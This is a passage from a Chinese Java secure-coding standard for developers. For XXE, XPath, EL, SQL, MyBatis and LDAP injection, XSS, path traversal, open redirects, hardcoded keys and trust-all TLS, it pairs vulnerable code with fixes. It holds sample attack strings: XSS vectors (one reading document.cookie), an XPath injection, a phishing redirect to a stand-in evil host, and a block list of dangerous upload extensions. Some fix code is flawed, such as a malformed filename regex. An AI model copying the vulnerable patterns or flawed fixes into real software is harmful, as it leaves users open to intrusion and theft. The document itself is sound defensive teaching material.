如果不需要 inline DOCTYPE 声明,应使用以下属性将其完全禁用:
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
要保护 TransformerFactory,应设置下列属性:
TransformerFactory transFact = TransformerFactory.newInstance();
transFact.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
Transformer trans = transFact.newTransformer(xsltSource);
trans.transform(xmlSource, result);
或者,也可以使用安全配置的 XMLReader 来设置转换源:
XMLReader reader = XMLReaderFactory.createXMLReader();
reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
Source xmlSource = new SAXSource(reader, new InputSource(new FileInputStream(xmlFile)));
Source xsltSource = new SAXSource(reader, new InputSource(new FileInputStream(xsltFile)));
Result result = new StreamResult(System.out);
TransformerFactory transFact = TransformerFactory.newInstance();
Transformer trans = transFact.newTransformer(xsltSource);
trans.transform(xmlSource, result);
XStream安全编码规范
XStream 是一款常用的xml文件处理组件,在编码过程中应使用 XStream 组件的setupDefaultSecurity
安全模式限制输入的数据,使用的 XStream 版本应不低于1.4.17。
// 安全编码示例
XStream xStream = newXStream();
// 必须开启安全模式,安全模式采用白名单限制输入的数据类型
XStream.setupDefaultSecurity(xStream);
// 在白名单内添加一些基本数据类型
xstream.addPermission(NullPermission.NULL);
xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);
xstream.allowTypeHierarchy(Collection.class);
// 在白名单内添加一个包下所有的子类
xstream.allowTypesByWildcard(new String[] {
Blog.class.getPackage().getName()+".*"
});
官方参考
http://x-stream.github.io/security.html#framework
http://x-stream.github.io/security.html#example
XPath注入
XPath注入风险类似于SQL注入,如果XPath查询包含不受信任的用户输入,则可能会暴露完整的数据
源。这可能使攻击者可以访问未经授权的数据或恶意修改目标XML。
下面以登录验证中的模块为例,说明 XPath注入攻击的实现原理。
在应用程序的登录验证程序中,一般有用户名(username)和密码(password) 两个参数,程序
会通过用户所提交输入的用户名和密码来执行授权操作。
若验证数据存放在XML文件中,其原理是通过查找user表中的用户名 (username)和密码
(password)的结果进行授权访问。
例存在user.xml文件如下:
<user>
<firstname>Ben</firstname>
<lastname>Elmore</lastname>
<loginID>abc</loginID>
<password>test123</password>
</user>
<user>
<firstname>Shlomy</firstname>
<lastname>Gantz</lastname>
<loginID>xyz</loginID>
<password>123test</password>
</user>
则在XPath中其典型的查询语句如下:
//users/user[loginID/text()='xyz'and password/text()='123test']
正常用户传入 login 和 password,例如 loginID = 'xyz' 和 password = '123test',则该查询语句将返回
true。但如果恶意用户传入类似 ' or 1=1 or ''=' 的值,那么该查询语句也会得到 true 返回值,因为
XPath 查询语句最终会变成如下代码:
//users/user[loginID/text()=''or 1=1 or ''='' and password/text()='' or 1=1 or ''='']
脆弱代码:
public int risk(HttpServletRequest request,
Document doc, XPath xpath ,org.apache.log4jLogger logger) {
int len = 0;
String path = request.getParameter("path");
try {
XPathExpression expr = xpath.compile(path);
Object result = expr.evaluate(doc, XPathConstants.NODESET);
NodeList nodes = (NodeList) result;
len = nodes.getLength();
} catch (XPathExpressionException e) {
logger.warn("Exception", e);
}
return len;
}
解决方案:
public int fix(HttpServletRequest request,
Document doc, XPath xpath ,org.apache.log4j.Logger logger) {
int len = 0;
String path = request.getParameter("path");
try {
// 使用过滤函数
String filtedXPath = filterForXPath(path);
XPathExpression expr = xpath.compile(filtedXPath);
Object result = expr.evaluate(doc, XPathConstants.NODESET);
NodeList nodes = (NodeList) result;
len = nodes.getLength();
} catch (XPathExpressionException e) {
logger.warn("Exception", e);
}
return len;
}
// 限制用户的输入数据,尤其应限制特殊字符
public String filterForXPath(String input) {
if (input == null) {
return null;
}
StringBuilder out = new StringBuilder();
for (int i = 0; i < input.length(); i++) {
char c = input.charAt(i);
if (c >= 'A' && c <= 'Z') {
out.append(c);
} else if (c >= 'a' && c <= 'z') {
out.append(c);
} else if (c >= '0' && c <= '9') {
out.append(c);
} else if (c == '_' || c == '-') {
//限制特殊字符的使用
out.append(c);
} else if (c >= 0x4e00 && c <= 0x9fa5) {
//允许汉字使用
out.append(c);
}
}
return out.toString();
}
EL表达式代码注入
在Spring中使用动态EL表达式可能导致恶意代码注入。
脆弱代码1:
public void parseExpressionInterface(Person personObj,String property) {
ExpressionParser parser = new SpelExpressionParser();
// property变量内容不做限制可能导致任意的EL表达式执行
Expression exp = parser.parseExpression(property+" == 'Albert'");
StandardEvaluationContext testContext = new StandardEvaluationContext(personObj);
boolean result = exp.getValue(testContext, Boolean.class);
}
脆弱代码2:
public void evaluateExpression(String expression) {
FacesContext context = FacesContext.getCurrentInstance();
ExpressionFactory expressionFactory = context.getApplication().getExpressionFactory();
ELContext elContext = context.getELContext();
// expression变量不做任何处理就交于表达式引擎执行可能导致任意的EL表达式执行
ValueExpression vex = expressionFactory.createValueExpression(elContext, expression, String.class);
return (String) vex.getValue(elContext);
}
解决方案:
禁止使用动态的EL表达式编写复杂逻辑,也应禁止执行用户输入的EL表达式。
未经验证的重定向
脆弱代码:
1. 诱使用户访问恶意URL:http://website.com/login?redirect=http://evil.vvebsite.com/fake/login
2. 将用户重定向到伪造的登录页面,该页面看起来像他们信任的站点。
(http://evil.vvebsite.com/fake/login)
3. 用户输入其凭据。
4. 恶意站点窃取用户的凭据,并将其重定向到原始网站。
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
resp.sendRedirect(req.getParameter("redirectUrl"));
}
解决方案:
不接受来自用户的重定向目标
使用哈希映射到目标地址,并使用哈希在白名单中查找合法目标
仅接受相对路径
白名单网址(如果可能)
验证URL的开头是否为白名单的一部分
Spring未验证的重定向
脆弱代码:
1. 诱使用户访问恶意URL:http://website.com/login?redirect=http://evil.vvebsite.com/fake/login
2. 将用户重定向到伪造的登录页面,该页面看起来像他们信任的站点。
(http://evil.vvebsite.com/fake/login)
3. 用户输入其凭据。
4. 恶意站点窃取用户的凭据,并将其重定向到原始网站。
@RequestMapping("/redirect")
public String redirect(@RequestParam("url") String url) {
return "redirect:" + url;
}
解决方案:
不接受来自用户的重定向目标
使用哈希映射到目标地址,并使用哈希在白名单中查找合法目标
仅接受相对路径
白名单网址(如果可能)
验证URL的开头是否为白名单的一部分
不安全的对象绑定
对用户输入数据绑定到对象时如不做限制,可能造成攻击者恶意覆盖用户数据
脆弱代码:
@javax.persistence.Entity
class UserEntity {
@Id
@GeneratedValue(strategy = GenerationType.IDENTITY)
private Long id;
private String username;
private String password;
private Long role;
}
@Controller
class UserController {
@PutMapping("/user/")
@ResponseStatus(value = HttpStatus.OK)
public void update(UserEntity user) {
// 攻击者可以构造恶意user对象,将id字段构造为管理员id,将password字段构造为弱密码
// 如果鉴权不完整,接口读取恶意user对象的id字段后会覆盖管理员的password字段成为弱密码
userService.save(user);
}
}
解决方案:
setAllowedFields白名单
@Controller
class UserController {
@InitBinder
public void initBinder(WebDataBinder binder, WebRequest request){
// 对允许绑定的字段设置白名单,阻止其他所有字段
binder.setAllowedFields(["role"]);
}
}
setDisallowedFields黑名单
@Controller
class UserController {
@InitBinder
public void initBinder(WebDataBinder binder, WebRequest request){
// 对不允许绑定的字段设置黑名单,允许其他所有字段
binder.setDisallowedFields(["username","password"]);
}
}
针对js脚本引擎的代码注入
攻击者可以构造恶意js注入到js引擎执行恶意代码,所以在java中使用js引擎应使用安全的沙盒模式执行
js代码。
脆弱代码:
public void runCustomTrigger(String script) {
ScriptEngineManager factory = new ScriptEngineManager();
ScriptEngine engine = factory.getEngineByName("JavaScript");
// 不执行安全校验,直接eval执行可能造成恶意的js代码执行
engine.eval(script);
}
解决方案:
java 8 或者 8 以上版本使用 delight-nashorn-sandbox 组件
<dependency>
<groupId>org.javadelight</groupId>
<artifactId>delight-nashorn-sandbox</artifactId>
<version>[insert latest version]</version>
</dependency>
// 创建沙盒
NashornSandbox sandbox = NashornSandboxes.create();
// 沙盒内默认禁止js代码访问所有的java类对象
// 沙盒可以手工授权js代码能访问的java类对象
sandbox.allow(File.class);
// eval执行js代码
sandbox.eval("var File = Java.type('java.io.File'); File;")
java 7 使用 Rhino 引擎
public void runCustomTrigger(String script) {
// 启用 Rhino 引擎的js沙盒模式
SandboxContextFactory contextFactory = new SandboxContextFactory();
Context context = contextFactory.makeContext();
contextFactory.enterContext(context);
try {
ScriptableObject prototype = context.initStandardObjects();
prototype.setParentScope(null);
Scriptable scope = context.newObject(prototype);
scope.setPrototype(prototype);
context.evaluateString(scope,script, null, -1, null);
} finally {
context.exit();
}
}
JavaBeans属性注入
如果系统设置bean属性前未进行严格的校验,攻击者可以设置能影响系统完整性的任意bean属性。例
如BeanUtils.populate函数或类似功能函数允许设置Bean属性或嵌套属性。攻击者可以利用此功能来访
问特殊的Bean属性 class.classLoader,从而可以覆盖系统属性并可能执行任意代码。
脆弱代码:
MyBean bean = ...;
HashMap map = new HashMap();
Enumeration names = request.getParameterNames();
while (names.hasMoreElements()) {
String name = (String) names.nextElement();
map.put(name, request.getParameterValues(name));
}
BeanUtils.populate(bean, map);
解决方案:
Bean属性的成分复杂,用户输入的数据应严格校验后才能填充到Bean的属性。
跨站脚本攻击(XSS)
攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶
意脚本代码的执行,从而达到恶意攻击用户的目的。
常见的攻击向量:
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<Video> <source onerror = "javascript: alert (XSS)">
<Input value = "XSS" type = text>
<applet code="javascript:confirm(document.cookie);">
<isindex x="javascript:" onmouseover="alert(XSS)">
"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><img src="x:x" onerror="alert(XSS)">
"><iframe src="javascript:alert(XSS)">
<object data="javascript:alert(XSS)">
<isindex type=image src=1 onerror=alert(XSS)>
<img src=x:alert(alt) onerror=eval(src) alt=0>
<img src="x:gif" onerror="window['al\u0065rt'](0)"></img>
解决方案:
禁止简单的正则过滤,浏览器存在容错机制会将攻击者精心构造的变形前端代码渲染成攻击向量。
原则上禁止用户输入特殊字符,或者转义用户输入的特殊字符。
对富文本输出内容进行白名单校验,只能对用户渲染安全的HTML标签和安全的HTML属性,请参
照以下链接。
https://github.com/cure53/DOMPurify
https://github.com/leizongmin/js-xss/blob/master/README.zh.md
第九条 必须过滤上传文件
必须检查上传文件的类型、名称等,并使用正则表达式等
对文件名做严格的检查,限定文件名只能包括字母和数
字,同时限制文件的操作权限,并对文件的访问路径进行
验证。
编码类要求:
潜在的路径遍历(读取文件)
当系统读取文件名打开对应的文件以读取其内容,而该文件名来自于用户的输入数据。如果将未经过滤
的文件名数据传递给文件API,则攻击者可以从系统中读取任意文件。
脆弱代码:
@GET
@Path("/images/{image}")
@Produces("images/*")
public Response getImage(@javax.ws.rs.PathParam("image") String image) {
// image变量中未校验 ../ 或 ..\
File file = new File("resources/images/", image);
if (!file.exists()) {
return Response.status(Status.NOT_FOUND).build();
}
return Response.ok().entity(new FileInputStream(file)).build();
}
解决方案:
import org.apache.commons.io.FilenameUtils;
@GET
@Path("/images/{image}")
@Produces("images/*")
public Response getImage(@javax.ws.rs.PathParam("image") String image) {
// 首先进行逻辑校验,判断用户是否有权限访问接口 以及 用户对访问的资源是否有权限
// 过滤image变量中的 ../ 或 ..\
File file = new File("resources/images/", FilenameUtils.getName(image));
if (!file.exists()) {
return Response.status(Status.NOT_FOUND).build();
}
return Response.ok().entity(new FileInputStream(file)).build();
}
如果不对用户发起请求的文件参数进行校验,会导致潜在的路径遍历漏洞。
应对所有文件的上传操作进行权限判断,无上传权限应直接提示无权限。
危险的文件后缀应严禁上传,包括: .jsp .jspx .war .jar .exe .bat .js .vbs .html .shtml
应依照业务逻辑对文件后缀进行前后端的白名单校验,禁止白名单之外的文件上传
图片类型 .jpg .png .gif .jpeg
文档类型 .doc .docx .ppt .pptx .xls .xlsx .pdf
以此类推
上传的文件保存时应使用uuid、雪花算法等算法进行强制重命名,以保证文件的不可预测性和唯一
性。
应对所有文件的下载操作依照 “除了公共文件,只有上传者才能下载” 的原则进行权限判断,防止越
权攻击。
潜在的路径遍历(写入文件)
当系统打开文件并写入数据,而该文件名来自于用户的输入数据。如果将未经过滤的文件名数据传递给
文件API,则攻击者可以写入任意数据到系统文件中。
脆弱代码:
解决方案:
@RequestMapping("/MVCUpload")
public String MVCUpload(@RequestParam( "description" ) String description, @RequestParam("file") MultipartFile fi
// 首先进行逻辑校验,判断用户是否有权限访问接口 以及 用户对访问的资源是否有权限
InputStream inputStream=file.getInputStream();
String fileName=file.getOriginalFilename();
// 文件名fileName未校验 ../ 或 ..\ 并且也未校验文件后缀
OutputStream outputStream=new FileOutputStream("/tmp/"+fileName);
byte[] bytes=new byte[10];
int len=-1;
// 将文件写入服务器中
while((len=inputStream.read(bytes))!=-1){
outputStream.write(bytes,0,len);
}
outputStream.close();
inputStream.close();
// 记录审计日志
return "success";
}
import org.apache.commons.io.FilenameUtils;
@RequestMapping("/MVCUpload")
public String MVCUpload(@RequestParam( "description" ) String description, @RequestParam("file") MultipartFile fi
// 首先进行逻辑校验,判断用户是否有权限访问接口 以及 用户对访问的资源是否有权限
InputStream inputStream=file.getInputStream();
String fileInput;
if(file.getOriginalFilename() == null){
return "error";
}
// 获取上传文件名后强制转化为小写并过滤空白字符
fileInput=file.getOriginalFilename().toLowerCase().trim();
// 对变量fileInput所代表的文件路径去除目录和后缀名,可以过滤文件名中的 ../ 或 ..\
String fileName=FilenameUtils.getBaseName(fileInput);
// 获取文件后缀
String ext=FilenameUtils.getExtension(fileInput);
// 文件名应大于5小于30
if ( 5 > fileName.length() || fileName.length() > 30 ) {
return "error";
}
// 文件名只能包含大小写字母、数字和中文
if(fileName.matches("0-9a-zA-Z\u4E00-\u9FA5]+")){
return "error";
}
// 依据业务逻辑使用白名单校验文件后缀
if(!"jpg".equals(ext)){
return "error";
}
// 将文件写入服务器中,确保文件不写入web路径中
OutputStream outputStream=new FileOutputStream("/tmp/"+ fileName + "." + ext);
byte[] bytes=new byte[10];
int len=-1;
while((len=inputStream.read(bytes))!=-1){
outputStream.write(bytes,0,len);
}
outputStream.close();
inputStream.close();
// 记录审计日志
如果不对用户发起请求的文件参数进行校验,会导致潜在的路径遍历漏洞。
应对所有文件的上传操作进行权限判断,无上传权限应直接提示无权限。
危险的文件后缀应严禁上传,包括: .jsp .jspx .war .jar .exe .bat .js .vbs .html .shtml
应依照业务逻辑对文件后缀进行前后端的白名单校验,禁止白名单之外的文件上传
图片类型 .jpg .png .gif .jpeg
文档类型 .doc .docx .ppt .pptx .xls .xlsx .pdf
以此类推
上传的文件保存时应使用uuid、雪花算法等算法进行强制重命名,以保证文件的不可预测性和唯一
性。
应对所有文件的下载操作依照 “除了公共文件,只有上传者才能下载” 的原则进行权限判断,防止越
权攻击。
第十一条 确保多线程编程的安全性
确保在多线程编程中正确的访问共享变量,避免多个线程
同时修改一个共享变量。
编码类要求:
竞争条件
当两个或两个以上的线程对同一个数据进行操作的时候,可能会产生“竞争条件”的现象。这种现象产生
的根本原因是因为多个线程在对同一个数据进行操作,此时对该数据的操作是非“原子化”的,可能前一
个线程对数据的操作还没有结束,后一个线程又开始对同样的数据开始进行操作,这就可能会造成数据
结果的变化未知。
解决方案:
HashMap、HashSet是非线程安全的;
而Vector、HashTable内部的方法基本都是synchronized,所以是线程安全的。
而在高并发下应使用Concurrent包中的集合类。同时在单线程下禁止使用synchronized。
return "success";
}
第十二条 设计错误、异常处理机制
应设计并建立防止系统死锁的机制及异常情况的处理和恢
复机制,避免程序崩溃。
编码类要求:
一、java 类库中定义的可以通过预检查方式规避的 RuntimeException 异常不应该通过catch 的方式来
处理,比如:NullPointerException,IndexOutOfBoundsException 等等。
说明:无法通过预检查的异常除外,比如,在解析字符串形式的数字时,可能存在数字格式错误,应通
过 catch NumberFormatException 来实现。
正例:
if (obj != null) {
...
}
反例:
try {
obj.method();
} catch ( NullPointerException e ) {
...
}
二、异常捕获后不要用来做流程控制,条件控制。
说明:异常设计的初衷是解决程序运行中的各种意外情况,且异常的处理效率比条件判断方式要低很
多。
三、catch 时请分清稳定代码和非稳定代码,稳定代码指的是无论如何不会出错的代码。对于非稳定代
码的 catch 尽可能进行区分异常类型,再做对应的异常处理。
说明:对大段代码进行 try-catch,使程序无法根据不同的异常做出正确的应激反应,也不利于定位问
题,这是一种不负责任的表现。
正例:用户注册的场景中,如果用户用户名称已存在或用户输入密码过于简单,在程序上作出"用户
名或密码错误",并提示给用户。
反例:用户提交表单场景中,如果用户输入的价格为感叹号,系统不做任何提示,系统在后台提示
报错。
四、捕获异常是为了处理它,不要捕获了却什么都不处理而抛弃之,如果不想处理它,请将该异常抛给
它的调用者。最外层的业务使用者,必须处理异常,将其转化为用户可以理解的内容。
五、事务场景中,抛出异常被 catch 后,如果需要回滚,一定要注意手动回滚事务。
六、finally 块中必须对临时文件、资源对象、流对象进行资源释放,有异常也要做 try-catch。
说明:如果 JDK7 及以上,可以使用 try-with-resources 方式。
七、不要在 finally 块中使用 return。
说明:try 块中的 return 语句执行成功后,并不马上返回,而是继续执行 finally 块中的语句,如果此处
存在 return 语句,则在此直接返回,无情丢弃掉 try 块中的返回点。
反例:
private int x = 0;
public int checkReturn(){
try {
/* x 等于 1,此处不返回 */
return(++x);
} finally {
/* 返回的结果是 2 */
return(++x);
}
}
八、捕获异常与抛异常,必须是完全匹配,或者捕获异常是抛异常的父类。
说明:如果预期对方抛的是绣球,实际接到的是铅球,就会产生意外情况。
九、在调用 RPC、二方包、或动态生成类的相关方法时,捕捉异常必须使用 Throwable类来进行拦截。
说明:通过反射机制来调用方法,如果找不到方法,抛出 NoSuchMethodException。什么情况会抛出
NoSuchMethodError 呢?二方包在类冲突时,仲裁机制可能导致引入非预期的版本使类的方法签名不
匹配,或者在字节码修改框架(比如:ASM)动态创建或修改类时,修改了相应的方法签名。这些情
况,即使代码编译期是正确的,但在代码运行期时,会抛出 NoSuchMethodError。
十、方法的返回值可以为 null,不强制返回空集合,或者空对象等,必须添加注释充分说明什么情况下
会返回 null 值。
说明:本手册明确防止 NPE 是调用者的责任。即使被调用方法返回空集合或者空对象,对调用者来
说,也并非高枕无忧,必须考虑到远程调用失败、序列化失败、运行时异常等场景返回 null 的情况。
十一、防止 NPE,是程序员的基本修养,注意 NPE 产生的场景:
1. 数据库的查询结果可能为 null。
2. 集合里的元素即使 isNotEmpty,取出的数据元素也可能为 null。
3. 远程调用返回对象时,一律要求进行空指针判断,防止 NPE。
4. 对于 Session 中获取的数据,建议进行 NPE 检查,避免空指针。
5. 级联调用 obj.getA().getB().getC();一连串调用,易产生 NPE。应使用 JDK8 的 Optional 类来防止
NPE 问题。
6. 返回类型为基本数据类型,return 包装数据类型的对象时,自动拆箱有可能产生 NPE。
反例:
public int f() { return Integer 对象} // 如果为 null,自动解箱抛 NPE。
十二、定义时区分 unchecked / checked 异常,避免直接抛出 new RuntimeException(),更不允许抛出
Exception 或者 Throwable,应使用有业务含义的自定义异常。推荐业界已定义过的自定义异常,如:
DAOException / ServiceException 等。
十三、对于公司外的 http/api 开放接口必须使用 errorCode;而应用内部推荐异常抛出;跨应用间 RPC
调用优先考虑使用 Result 方式,封装 isSuccess()方法、errorCode、errorMessage;而应用内部直接
抛出异常即可。
说明:关于 RPC 方法返回方式使用 Result 方式的理由:
1. 使用抛异常返回方式,调用方如果没有捕获到就会产生运行时错误。
2. 如果不加栈信息,只是 new 自定义异常,加入自己的理解的 error message,对于调用端解决问题
的帮助不会太多。如果加了栈信息,在频繁调用出错的情况下,数据序列化和传输的性能损耗也是
问题。
第十三条 数据库操作使用参数化请求方式
对需要使用SQL语句进行的数据库操作,必须通过构造参
数化的SQL语句来准确的向数据库指出哪些应该被当作数
据,避免通过构造包含特殊字符的SQL语句进行SQL注入
等攻击。
SQL注入
SQL注入即是指应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在应用程序中事先
定义好的SQL语句中添加额外的SQL语句。
脆弱代码:
public void risk(HttpServletRequest request, Connection c, org.apache.log4j.Logger logger) {
String text = request.getParameter("text");
// 使用sql拼接导致sql注入
String sql = "select * from tableName where columnName = '" + text + "'";
try {
Statement s = c.createStatement();
s.executeQuery(sql);
} catch (SQLException e) {
logger.warn("Exception", e);
}
}
解决方案:
public void fix(HttpServletRequest request, Connection c, org.apache.log4j.Logger logger) {
String text = request.getParameter("text");
// 使用 PreparedStatement 预编译并使用占位符防止sql注入
String sql = "select * from tableName where columnName = ?";
try {
PreparedStatement s = c.prepareStatement(sql);
s.setString(1, text);
s.executeQuery();
} catch (SQLException e) {
logger.warn("Exception", e);
}
}
接口对输入参数进行校验时,如不必要的特殊符号应一律禁止输入,以避免冷僻的sql注入攻击。
Mybatis安全编码规范
在 Mybatis 中除了极为特殊的情况,应禁止使用 $ 拼接sql。
所有 Mybatis 的实体bean对象字段都应使用包装类。
1.Mybatis 关键词like的安全编码
脆弱代码:
模糊查询like
Select * from news where title like '%#{title}%'
但由于这样写程序会报错,研发人员将SQL查询语句修改如下:
Select * from news where title like '%${title}%'
在这种情况下程序不再报错,但是此时产生了SQL语句拼接问题
如果java代码层面没有对用户输入的内容做处理势必会产生SQL注入漏洞
解决方案:
可使用 concat 函数解决SQL语句动态拼接的问题
select * from news where tile like concat('%', #{title}, '%')
注意!对搜索的内容必须进行严格的逻辑校验:
1)例如搜索用户手机号,应限制输入数据只能输入数字,防止出现搜索英文或中文的无效搜索
2)mybatis预编译不会转义 % 符号,应阻止用户输入 % 符号以防止全表扫描
3)输入数据长度和搜索频率应进行限制,防止恶意搜索导致的数据库拒绝服务
2.Mybatis sql的in语句的安全编码
脆弱代码:
在对同条件多值查询的时候,如当用户输入1001,1002,1003…100N时,如果考虑安全编码规范问题,其对应的SQL语句如下:
Select * from news where id in (#{id})
但由于这样写程序会报错,研发人员将SQL查询语句修改如下:
Select * from news where id in (${id})
修改SQL语句之后,程序停止报错,但是却引入了SQL语句拼接的问题
如果研发人员没有对用户输入的内容做过滤,势必会产生SQL注入漏洞
解决方案:
可使用Mybatis自带循环指令解决SQL语句动态拼接的问题
select * from news where id in
<foreach collection="ids" item="item" open="(" separator="," close=")">#{item}</foreach>
3.Mybatis 排序语句order by 的安全编码
脆弱代码:
当根据发布时间、点击量等信息进行排序的时候,如果考虑安全编码规范问题,其对应的SQL语句如下:
Select * from news where title = '电力' order by #{time} asc
但由于发布时间time不是用户输入的参数,无法使用预编译。研发人员将SQL查询语句修改如下:
Select * from news where title = '电力' order by ${time} asc
修改之后,程序通过预编译,但是产生了SQL语句拼接问题,极有可能引发SQL注入漏洞。
解决方案:
可使用Mybatis自带choose指令解决SQL语句动态拼接的问题
ORDER BY
<choose>
<when test="orderBy == 1">
id desc
</when>
<when test="orderBy == 2">
date desc
</when>
<otherwise>
time desc
</otherwise>
</choose>
LDAP注入
与SQL一样,传递给LDAP数据库的查询请求中所有输入都必须安全校验。
由于LDAP没有类似SQL的预编译函数。因此,针对LDAP注入的主要防御措施是按照长度、格式、逻
辑、特殊字符4个维度对每一个输入参数进行安全校验。
脆弱代码:
String username = request.getParameter("username");
// 未对 username 展开校验直接拼接
NamingEnumeration answers = context.search("dc=People,dc=example,dc=com","(uid=" + username + ")", ctrls);
解决方案:
应依照LDAP数据库字段设计,严格校验username的长度、格式、逻辑和特殊字符。
第十四条 禁止在源代码中写入口令、服务器
IP等敏感信息
应将加密后的口令、服务器IP、加密密钥等敏感信息存储
在配置文件、数据库或者其它外部数据源中,禁止将此类
敏感信息存储在代码中。
编码类要求:
硬编码密码
脆弱代码:
密码不应保留在源代码中。源代码只能在企业环境中受限的共享,禁止在互联网中共享。
为了安全管理,密码和密钥应存储在单独的加密配置文件或密钥库中。
private String SECRET_PASSWORD = "letMeIn!";
Properties props = new Properties();
props.put(Context.SECURITY_CREDENTIALS, "password");
硬编码密钥
脆弱代码:
密钥不应保留在源代码中。源代码只能在企业环境中受限的共享,禁止在互联网中共享。为了安全管
理,密码和密钥应存储在单独的加密配置文件或密钥库中。
byte[] key = {1, 2, 3, 4, 5, 6, 7, 8};
SecretKeySpec spec = new SecretKeySpec(key, "AES");
Cipher aes = Cipher.getInstance("AES");
aes.init(Cipher.ENCRYPT_MODE, spec);
return aesCipher.doFinal(secretData);
第十五条 为所有敏感信息采用加密传输
为所有要求身份验证的访问内容和所有其他的敏感信息提
供加密传输。
编码类要求:
接受任何证书的TrustManager
空的TrustManager通常用于实现直接连接到未经根证书颁发机构签名的主机。
同时,如果客户端将信任所有的证书会导致应用系统很容易受到中间人攻击。
脆弱代码:
解决方案:
KeyStore ks = //加载包含受信任证书的密钥库
SSLContext sc = SSLContext.getInstance("TLS");
TrustManagerFactory tmf = TrustManagerFactory.getInstance("SunX509");
tmf.init(ks);
sc.init(kmf.getKeyManagers(), tmf.getTrustManagers(),null);
接受任何签名证书的HostnameVerifier
class TrustAllManager implements X509TrustManager {
@Override
public void checkClientTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException
//Trust any client connecting (no certificate validation)
}
@Override
public void checkServerTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException
//Trust any remote server (no certificate validation)
}
@Override
public X509Certificate[] getAcceptedIssuers() {
return null;
}
}
HostnameVerifier 由于许多主机上都重复使用了证书,因此经常使用接受任何主机的请求。这很容
易受到中间人攻击,因为客户端将信任任何证书。
应该构建允许特定证书(例如基于信任库)的TrustManager,并创建通配符证书,保证可以在多个
子域上重用。
脆弱代码:
public class AllHosts implements HostnameVerifier {
public boolean verify(final String hostname, final SSLSession session) {
return true;
}
}
解决方案:
KeyStore ks = //加载包含受信任证书的密钥库
SSLContext sc = SSLContext.getInstance("TLS");
TrustManagerFactory tmf = TrustManagerFactory.getInstance("SunX509");
tmf.init(ks);
sc.init(kmf.getKeyManagers(), tmf.getTrustManagers(), null);
第十六条 使用可信的密码算法
如果应用程序需要加密、数字签名、密钥交换或者安全散
列,应使用国密算法。
架构设计类要求:
禁止使用弱加密
电力系统可以使用rsa2048和aes256的组合作为等保二级系统对重要数据传输的加密算法。
电力系统必须使用国密系列算法的组合作为等保三级系统对重要数据传输的加密算法。
重要的敏感数据在传输过程中必须加密传输,如该类数据需要保存在数据库中,必须二次加密后才
能保存。
电力系统前端js代码必须使用混淆和加密手段,保证js源代码无法被轻易逆向分析。
可信的算法必须结合可靠的加密流程形成加密方案,例如用户登录时必须使用合规的加密方案加密
用户名和密码:
编码类要求:
可预测的伪随机数生成器
当在某些安全关键的上下文中使用可预测的随机值时,可能会导致漏洞。
例如,当该值用作:
CSRF令牌:可预测的令牌可能导致CSRF攻击,因为攻击者将知道令牌的值
密码重置令牌(通过电子邮件发送):可预测的密码令牌可能会导致帐户被接管,因为攻击者会猜
测“更改密码”表单的URL
任何其他敏感值
脆弱代码:
String generateSecretToken() {
Random r = new Random();
return Long.toHexString(r.nextLong());
}
解决方案:
替换 java.util.Random 使用强度更高的 java.security.SecureRandom
合规的双向加密数据的传输方案:
1)后端生成非对称算法(国密SM2、RSA2048)的公钥B1、私钥B2,前端访问后端获取公钥B1。公钥、私钥可以全系统固定为一对,前端
2)前端每次发送请求前,随机生成对称算法(国密SM4、AES256)的密钥A1。
3)前端用步骤2的密钥A1加密所有业务数据生成encrypt_data,用步骤1获取的公钥B1加密密钥A1生成encrypt_key。
4)前端用哈希算法对encrypt_data + encrypt_key的值形成一个校验值check_hash。
5)前端将encrypt_data、encrypt_key、check_hash三个参数包装在同一个http数据包中发送到后端。
6)后端获取三个参数后先判断哈希值check_hash是否匹配encrypt_data + encrypt_key以验证完整性。
7)后端用私钥B2解密encrypt_key获取本次请求的对称算法的密钥A1。
8)后端使用步骤7获取的密钥A1解密encrypt_data获取实际业务数据。
9)后端处理完业务逻辑后,将需要返回的信息使用密钥A1进行加密后回传给前端。
10)加密数据回传给前端后,前端使用A1对加密的数据进行解密获得返回的信息。
11)步骤2随机生成的密钥A1已经使用完毕,前端应将其销毁。
import org.apache.commons.codec.binary.Hex;
String generateSecretToken() {
SecureRandom secRandom = new SecureRandom();
byte[] result = new byte[32];
secRandom.nextBytes(result);
return Hex.encodeHexString(result);
}
错误的十六进制串联
将包含哈希签名的字节数组转换为人类可读的字符串时,如果逐字节读取该数组,则可能会发生转换错
误。
所有对于数据格式化的操作应优先使用规范的数据格式化处理机制。
脆弱代码:
MessageDigest md = MessageDigest.getInstance("SHA-256");
byte[] resultBytes = md.digest(password.getBytes("UTF-8"));
StringBuilder stringBuilder = new StringBuilder();
for(byte b :resultBytes) {
stringBuilder.append( Integer.toHexString( b & 0xFF ) );
}
return stringBuilder.toString();
对于上述功能,哈希值 “0x0679” 和 “0x6709” 都将输出为 “679”
解决方案:
stringBuilder.append(String.format("%02X", b));
第十七条 禁止在日志、话单、cookie等文件
中记录口令、银行账号、通信内容等敏感数据
应用程序应该避免将用户的输入直接记入日志、话单、
cookie等文件,同时对需要记入的数据进行校验和访问控
制。
编码类要求:
不受信任的会话Cookie值
HttpServletRequest.getRequestedSessionId() 该方法通常返回cookie的值 JSESSIONID。此值通常仅
由会话管理逻辑访问,而不能由常规开发人员代码访问。
传递给客户端的值通常是字母数字值(例如 JSESSIONID=jp6q31lq2myn)。但是,客户端可以更改该
值。以下HTTP请求说明了可能的修改。
GET /somePage HTTP/1.1
Host: yourwebsite.com
User-Agent: Mozilla/5.0
Cookie: JSESSIONID=Any value of the user's choice!!??'''">
JSESSIONID应仅用于查看其值是否与请求的URL权限(包括菜单URL和接口URL)是否匹配。如果存
在越权,则应将用户视为未经身份验证的用户。
此外,会话ID值永远不应记录到日志中,如果记录到日志中,则日志文件会包含有效的活动会话ID,从
而使内部人员可以劫持处于活动状态的ID和ID对应的权限。
日志伪造
